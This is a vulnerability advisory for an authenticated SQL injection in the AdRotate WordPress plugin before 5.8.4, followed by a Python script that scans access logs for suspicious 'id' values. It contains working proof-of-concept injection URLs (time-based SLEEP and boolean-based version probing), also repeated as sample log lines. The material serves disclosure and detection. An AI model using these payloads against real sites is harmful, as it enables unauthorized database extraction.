wpvulndb | Nguyen Anh Tien | WPVDB-ID:AAFAC655-3616-4B27-9D0F-1CBC2FAF0151
History: Jun 03, 2020 - 12:00 a.m.

AdRotate < 5.8.4 - Authenticated SQL Injection

2020-06-03 00:00:00
Nguyen Anh Tien
wpscan.com
8

EPSS: 0.001 (Low), Percentile: 48.0%

An authenticated SQL injection exists in AdRotate 5.8.3.1 via the “id” parameter. Exploitation requires an admin-privileged user. NOTE: The plugin author mistook this SQLi bug for XSS, but the remedy remains OK.

PoC

The “id” parameter is vulnerable to SQL injection.

Example 1:
http://example.com/wp-admin/admin.php?page=adrotate-statistics&view=group&id=1+AND+SLEEP(10)
Clear version: wp-admin/admin.php?page=adrotate-statistics&view=group&id=1 AND SLEEP(10)
This query will delay the page load by 10 seconds.

Example 2: Using a boolean-based technique, one can extract information about the system.
http://example.com/wp-admin/admin.php?page=adrotate-statistics&view=group&id=2+AND+1%3D(SELECT+IF+(+GREATEST(+ORD(MID(%40%40version%2C+1%2C+1))%2C+1)+%3D+53%2C+1%2C+0))
Clear version: wp-admin/admin.php?page=adrotate-statistics&view=group&id=2 AND 1=(SELECT IF ( GREATEST( ORD(MID(@@version, 1, 1)), 1) = 53, 1, 0))
This query checks whether the first character of the MySQL version is “5”.
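For detection on sites that ran an affected version, the following added example (not part of the original advisory or the plugin's code) scans web access logs for requests to the adrotate-statistics page whose “id” value is not a plain integer. The log lines are constructed samples in combined log format, and treating “id” as a numeric-only value is an assumption based on the examples above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Jun/2020:10:00:01 +0000] "GET /wp-admin/admin.php?page=adrotate-statistics&view=group&id=1 HTTP/1.1" 200 5120
203.0.113.9 - - [03/Jun/2020:10:00:07 +0000] "GET /wp-admin/admin.php?page=adrotate-statistics&view=group&id=1+AND+SLEEP(10) HTTP/1.1" 200 5120
203.0.113.9 - - [03/Jun/2020:10:00:30 +0000] "GET /wp-admin/admin.php?page=adrotate-statistics&view=group&id=2%20AND%201%3D1 HTTP/1.1" 200 5120
198.51.100.2 - - [03/Jun/2020:10:01:00 +0000] "GET /wp-admin/admin.php?page=other-plugin&id=abc HTTP/1.1" 200 812
""".splitlines()

# Client IP, timestamp and request target from a combined-log-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<target>\S+) [^"]*"'
)


def find_suspicious_requests(lines):
    """Return (ip, timestamp, decoded id) for adrotate-statistics requests
    whose id parameter is anything other than a run of digits."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        # parse_qs URL-decodes values, so "+" and "%20" both become spaces.
        params = parse_qs(url.query, keep_blank_values=True)
        if "adrotate-statistics" not in params.get("page", []):
            continue
        for value in params.get("id", []):
            # Assumption: a legitimate id is a numeric identifier.
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((m.group("ip"), m.group("ts"), value))
    return hits


if __name__ == "__main__":
    for ip, ts, value in find_suspicious_requests(SAMPLE_LOG):
        print(f"{ts} {ip} non-numeric id: {value!r}")
```

Because the injection requires an admin session, any hit is worth correlating with the admin account that was logged in from that client address at that time.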

CPE
Name: adrotate | Operator: lt | Version: 5.8.4
